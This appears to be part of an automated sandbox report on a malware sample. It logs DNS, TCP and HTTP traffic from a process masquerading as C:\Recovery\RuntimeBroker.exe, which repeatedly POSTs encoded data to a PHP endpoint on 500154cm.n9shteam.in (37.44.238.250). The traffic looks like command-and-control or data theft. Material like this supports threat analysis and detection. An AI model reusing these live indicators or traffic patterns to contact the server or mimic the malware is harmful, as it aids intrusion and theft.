                                                                                                            Nov 12, 2024 00:44:37.481190920 CET5019380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:37.488349915 CET805019337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:37.490216970 CET5019380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:37.490271091 CET5019380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:37.495034933 CET805019337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:37.533287048 CET805019237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:37.582911968 CET805019237.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:37.586164951 CET5019280192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:37.602178097 CET5019480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:37.607064009 CET805019437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:37.610155106 CET5019480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:37.610208988 CET5019480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:37.615134001 CET805019437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:37.842091084 CET5019380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:37.846920967 CET805019337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:37.847100973 CET805019337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:37.964162111 CET5019480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:37.969002008 CET805019437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:37.969069004 CET805019437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:37.969079018 CET805019437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:38.055742979 CET805019337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:38.135751009 CET805019337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:38.135813951 CET5019380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:38.194492102 CET805019437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:38.260890961 CET5019480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:38.278704882 CET805019437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:38.380557060 CET5019480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:38.417849064 CET5019380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:38.417975903 CET5019480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:38.418699026 CET5019580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:38.422990084 CET805019337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:38.423037052 CET5019380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:38.423373938 CET805019437.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:38.423412085 CET5019480192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:38.423578978 CET805019537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:38.423655987 CET5019580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:38.423731089 CET5019580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:38.428848028 CET805019537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:38.776561975 CET5019580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:38.810904026 CET805019537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:38.811208010 CET805019537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:38.811384916 CET805019537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:38.989043951 CET805019537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:39.061350107 CET805019537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:39.062172890 CET5019580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:39.066137075 CET5019580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:39.071373940 CET805019537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:39.074193954 CET5019580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:39.182133913 CET5019680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:39.188348055 CET805019637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:39.188462019 CET5019680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:39.188570023 CET5019680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:39.194963932 CET805019637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:39.545686960 CET5019680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:39.552218914 CET805019637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:39.552546978 CET805019637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:39.552578926 CET805019637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:39.756093025 CET805019637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:39.839874983 CET805019637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:39.842214108 CET5019680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:39.964679003 CET5019680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:39.965385914 CET5019780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:39.972003937 CET805019637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:39.972043991 CET5019680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:39.972050905 CET805019737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:39.972125053 CET5019780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:39.972299099 CET5019780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:39.979275942 CET805019737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:40.323445082 CET5019780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:40.328516006 CET805019737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:40.328527927 CET805019737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:40.328536034 CET805019737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:40.539990902 CET805019737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:40.589020967 CET5019780192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:44:40.621489048 CET805019737.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:44:40.792354107 CET5019780192.168.2.437.44.238.250

                                                                                                            UDP Packets

                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Nov 12, 2024 00:42:16.817224979 CET5720853192.168.2.41.1.1.1
                                                                                                            Nov 12, 2024 00:42:16.828620911 CET53572081.1.1.1192.168.2.4

                                                                                                            DNS Queries

                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                            Nov 12, 2024 00:42:16.817224979 CET192.168.2.41.1.1.10xe0e8Standard query (0)500154cm.n9shteam.inA (IP address)IN (0x0001)false

                                                                                                            DNS Answers

                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                            Nov 12, 2024 00:42:16.828620911 CET1.1.1.1192.168.2.40xe0e8No error (0)500154cm.n9shteam.in37.44.238.250A (IP address)IN (0x0001)false

                                                                                                            HTTP Request Dependency Graph

                                                                                                            • 500154cm.n9shteam.in

                                                                                                            HTTP Packets

                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            0192.168.2.44973137.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:42:16.877166986 CET315OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 344
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:42:17.229152918 CET344OUTData Raw: 00 0a 01 06 06 01 01 00 05 06 02 01 02 07 01 05 00 06 05 0b 02 07 03 0d 00 53 0e 03 06 01 03 04 0c 04 05 00 00 04 05 05 0f 05 04 01 06 00 05 55 05 03 0d 08 0e 03 07 0b 04 50 04 01 04 57 07 00 00 06 0f 5c 00 03 04 52 0b 04 0f 02 0d 01 0f 51 07 51
                                                                                                            Data Ascii: SUPW\RQQQ\L~Ahf@camuuh@Uuvoc]|pkYoUs{bhmht^c]i_~V@A{SbL}Le
                                                                                                            Nov 12, 2024 00:42:17.459933996 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:42:17.538325071 CET1236INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:17 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 1368
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 56 4a 7e 4c 7b 7d 59 49 6f 5b 63 5d 68 4f 7c 5b 7d 64 73 4f 7c 70 75 41 7a 73 7c 42 7d 5b 78 03 63 63 75 08 79 5f 61 01 77 75 68 48 6a 61 78 01 55 4b 71 41 60 5b 63 4a 7f 62 79 4f 6b 01 6a 08 6c 65 7c 41 6a 60 74 58 62 62 7d 05 74 61 75 48 7c 4f 7a 01 6a 7c 56 0d 7d 01 7c 5f 62 76 7b 06 7c 5b 62 59 7e 63 6a 59 6f 67 70 43 6c 59 51 5e 6c 53 5e 58 79 5c 6c 48 6c 60 62 06 7d 70 63 59 79 77 56 4a 7c 62 78 5c 76 5f 64 04 7a 51 41 5b 6b 64 7b 52 7c 5f 62 55 62 52 6b 5a 78 0a 68 03 76 63 62 0c 7a 58 65 49 69 7c 76 05 6c 5f 5b 5d 76 5a 67 06 61 58 7b 5e 74 07 7e 50 7e 5d 7a 06 77 71 7d 07 76 65 68 09 7f 7f 75 05 60 6f 70 04 7c 63 6f 59 6f 6c 5d 03 6f 70 66 44 6b 6d 7f 51 77 67 6c 05 69 62 62 09 7e 53 63 0d 6c 43 5c 02 6a 5c 53 40 7b 5d 46 51 7c 55 6c 43 7f 70 7c 42 69 5e 62 06 6f 53 5a 5e 7b 62 5a 46 7c 07 6b 03 7e 01 6c 54 7f 4e 69 0b 6d 4d 6b 5d 6a 72 67 58 63 73 57 51 7b 5c 79 03 76 76 74 48 7e 76 70 03 7f 76 53 41 76 72 73 4a 7c 62 5b 4d 7c 67 76 0a 7b 66 6c 0c 7c 63 67 04 75 4c 5f 4c 74 61 7d 4a 7f 71 [TRUNCATED]
                                                                                                            Data Ascii: VJ~L{}YIo[c]hO|[}dsO|puAzs|B}[xccuy_awuhHjaxUKqA`[cJbyOkjle|Aj`tXbb}tauH|Ozj|V}|_bv{|[bY~cjYogpClYQ^lS^Xy\lHl`b}pcYywVJ|bx\v_dzQA[kd{R|_bUbRkZxhvcbzXeIi|vl_[]vZgaX{^t~P~]zwq}vehu`op|coYol]opfDkmQwglibb~SclC\j\S@{]FQ|UlCp|Bi^boSZ^{bZF|k~lTNimMk]jrgXcsWQ{\yvvtH~vpvSAvrsJ|b[M|gv{fl|cguL_Lta}JqbK}llgsvaYxrq}NaDygxxwRO{ScHzblIx]z}`pxwt}rsvORH~|{H|YVO|__NuRp{lVFt`f@zay~RzN{OTHu]UuaVOwOfN~`rtb}wuhBBSOvl|LclIxR]zpj}}^vwZN~rbA|mgxCv}bSM^|Rp~^RO~gf{Cc{LZaU}wwB~`}B{cxbRwsyOzqWwfpK}vRvStbk|raM|YrxH`}]v\}wa_I|qfI}B^}wUuOsIxLaH}`u{I^C{whxmcy\|{M\O{]NZxgxDiqsvsY|ckgYR|_PSuBs\xBxwNbmafX~Uj_z\yvxBagx[L~JxYjtbPXwv`A|UatB^k]^DlUdZ{`rI}mwSw`j\aSzSYQVq}@T[\\hl{uSoUe|]RtAfW|boaCkm`ePtdPUsfVm`Yj[MG]fAbrbeEQ{_S\SQuu{|L\\}grC{_l|scwr_L`OikXz}|tidDvakJl_qVMr]ldCT{o[WnWT[cIQ`aLVwpYl\Mt_|G}QJwZQ~v~WboAWpg_Xc_mXVkz|^]\NtiZDppyIU|X^uur[bfOSpf[XoSRZo]WoG|^\ZfTopuU@S[DQz|VonAR~fY [TRUNCATED]
                                                                                                            Nov 12, 2024 00:42:17.538343906 CET289INData Raw: 5a 7e 75 7a 5b 68 64 0a 4e 54 7a 6f 56 52 60 07 56 61 04 01 07 5b 5b 6a 49 54 60 7d 47 6a 7f 60 50 7f 5a 78 65 6d 4c 7b 43 7c 5b 5c 5c 51 07 7a 40 52 64 5d 44 54 5f 00 5f 54 0a 64 44 53 7e 7f 04 61 5a 71 42 68 67 70 05 7f 5f 63 46 52 6e 64 5b 62
                                                                                                            Data Ascii: Z~uz[hdNTzoVR`Va[[jIT`}Gj`PZxemL{C|[\\Qz@Rd]DT__TdDS~aZqBhgp_cFRnd[bvwdWphk|_Pm^ioZVU][`g~J}XP\QqEQbWAZ[YZXbUSZas[jYq[VQxQG\coCRpAlZGm}EPWkI[^oCTsPQncQzP~_|uzYhcOPpoWQc^QtqTa`lqdX~\{Zp|VkcOVo[QaW[pMn\\e
                                                                                                            Nov 12, 2024 00:42:17.590909004 CET291OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 384
                                                                                                            Expect: 100-continue
                                                                                                            Nov 12, 2024 00:42:17.764523983 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:42:17.765181065 CET384OUTData Raw: 51 51 5b 5e 53 5d 59 5c 5c 58 5a 51 50 53 58 52 5b 56 5e 58 55 5a 5a 54 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QQ[^S]Y\\XZQPSXR[V^XUZZT__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'- 6=;95-%&85,>*!(']*975]+%&[!"^.
                                                                                                            Nov 12, 2024 00:42:18.014419079 CET308INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:17 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 152
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 02 1e 22 0d 3c 03 33 1c 21 2f 33 08 2d 2d 21 0f 25 30 20 10 28 01 38 59 35 00 30 5c 2c 1d 03 55 34 00 05 06 27 03 2d 5b 20 3f 31 51 28 12 21 5b 05 12 22 07 34 15 02 56 28 2c 2c 13 2d 31 2c 05 21 0e 02 07 2e 07 27 53 3e 17 36 0c 30 3c 2a 56 27 0f 38 1d 3a 2d 2a 58 3c 01 23 56 23 34 2e 55 0b 11 23 52 30 06 23 51 37 01 2f 58 32 00 34 51 21 3e 29 0e 31 5c 24 50 32 2a 23 1e 32 1f 07 04 32 0c 2e 5c 27 3a 36 03 3f 39 2b 5a 24 10 23 51 2d 05 2f 56 03 3d 5b 57
                                                                                                            Data Ascii: "<3!/3--!%0 (8Y50\,U4'-[ ?1Q(!["4V(,,-1,!.'S>60<*V'8:-*X<#V#4.U#R0#Q7/X24Q!>)1\$P2*#22.\':6?9+Z$#Q-/V=[W


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            1192.168.2.44973337.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:42:17.767941952 CET292OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2504
                                                                                                            Expect: 100-continue
                                                                                                            Nov 12, 2024 00:42:18.119329929 CET2504OUTData Raw: 54 51 5b 5e 56 50 59 59 5c 58 5a 51 50 5a 58 5c 5b 54 5e 50 55 58 5a 5c 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: TQ[^VPYY\XZQPZX\[T^PUXZ\__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'_,3=>:#<=';!/=#>6;6%=)\(%&]7!+%&[!"^.
                                                                                                            Nov 12, 2024 00:42:18.335958004 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:42:18.407733917 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:18 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            2192.168.2.44973537.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:42:18.670970917 CET292OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 1812
                                                                                                            Expect: 100-continue
                                                                                                            Nov 12, 2024 00:42:19.025418997 CET1812OUTData Raw: 54 51 5b 50 56 5c 59 5d 5c 58 5a 51 50 58 58 51 5b 56 5e 5d 55 5c 5a 59 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: TQ[PV\Y]\XZQPXXQ[V^]U\ZY__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'90!=56E'50"+#=6"Q$.=[>%*#3=?5&[!"^.!
                                                                                                            Nov 12, 2024 00:42:19.367739916 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:42:19.368887901 CET308INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:19 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 152
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 02 1e 22 0c 28 04 3b 11 36 5a 20 54 39 2e 03 09 27 30 06 11 2b 28 24 59 21 07 20 10 2c 0d 0f 56 22 3d 2f 03 24 5c 2e 02 22 2f 31 18 28 02 21 5b 05 12 21 17 23 5d 2f 0c 3f 05 24 5a 2d 0f 02 02 22 1e 09 59 2d 39 0e 08 2a 00 3e 0e 24 3c 0f 0e 30 1f 24 5a 3a 2d 2a 15 28 2f 23 50 35 1e 2e 55 0b 11 23 54 30 38 09 1c 20 01 2f 58 25 10 09 09 22 3d 0b 08 26 2a 2b 0d 26 14 2b 5b 26 08 39 02 32 0b 31 06 25 39 3d 5f 2a 39 33 1f 33 00 23 51 2d 05 2f 56 03 3d 5b 57
                                                                                                            Data Ascii: "(;6Z T9.'0+($Y! ,V"=/$\."/1(![!#]/?$Z-"Y-9*>$<0$Z:-*(/#P5.U#T08 /X%"=&*+&+[&921%9=_*933#Q-/V=[W
                                                                                                            Nov 12, 2024 00:42:19.368982077 CET308INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:19 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 152
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 02 1e 22 0c 28 04 3b 11 36 5a 20 54 39 2e 03 09 27 30 06 11 2b 28 24 59 21 07 20 10 2c 0d 0f 56 22 3d 2f 03 24 5c 2e 02 22 2f 31 18 28 02 21 5b 05 12 21 17 23 5d 2f 0c 3f 05 24 5a 2d 0f 02 02 22 1e 09 59 2d 39 0e 08 2a 00 3e 0e 24 3c 0f 0e 30 1f 24 5a 3a 2d 2a 15 28 2f 23 50 35 1e 2e 55 0b 11 23 54 30 38 09 1c 20 01 2f 58 25 10 09 09 22 3d 0b 08 26 2a 2b 0d 26 14 2b 5b 26 08 39 02 32 0b 31 06 25 39 3d 5f 2a 39 33 1f 33 00 23 51 2d 05 2f 56 03 3d 5b 57
                                                                                                            Data Ascii: "(;6Z T9.'0+($Y! ,V"=/$\."/1(![!#]/?$Z-"Y-9*>$<0$Z:-*(/#P5.U#T08 /X%"=&*+&+[&921%9=_*933#Q-/V=[W


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            3192.168.2.44973637.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:42:18.672691107 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:42:19.025933027 CET2512OUTData Raw: 54 55 5e 53 56 5b 5c 5f 5c 58 5a 51 50 58 58 52 5b 50 5e 5b 55 54 5a 55 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: TU^SV[\_\XZQPXXR[P^[UTZU__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'^-*>;25<%'8!88T)*Z5*31[)&"\ #>)5&[!"^.!
                                                                                                            Nov 12, 2024 00:42:19.367254019 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:42:19.368865013 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:19 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ
                                                                                                            Nov 12, 2024 00:42:19.368951082 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:19 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            4192.168.2.44973837.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:42:19.649044037 CET292OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Nov 12, 2024 00:42:19.994110107 CET2512OUTData Raw: 54 56 5b 56 56 5c 59 5b 5c 58 5a 51 50 53 58 51 5b 56 5e 5c 55 5f 5a 5c 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: TV[VV\Y[\XZQPSXQ[V^\U_Z\__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\']. %>5>C0586^ = >X#(-P3X=*%&]4Z(5&[!"^.
                                                                                                            Nov 12, 2024 00:42:20.214418888 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:42:20.291225910 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:20 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            5192.168.2.44973937.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:42:21.065226078 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:42:21.415997982 CET2512OUTData Raw: 54 54 5b 5e 56 5f 59 52 5c 58 5a 51 50 5e 58 52 5b 56 5e 5a 55 5d 5a 5e 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: TT[^V_YR\XZQP^XR[V^ZU]Z^__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\$9!>(&"E$;!(R*06^!)Q0)Y=)!0=(%&[!"^.9
                                                                                                            Nov 12, 2024 00:42:21.630490065 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:42:21.703578949 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:21 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
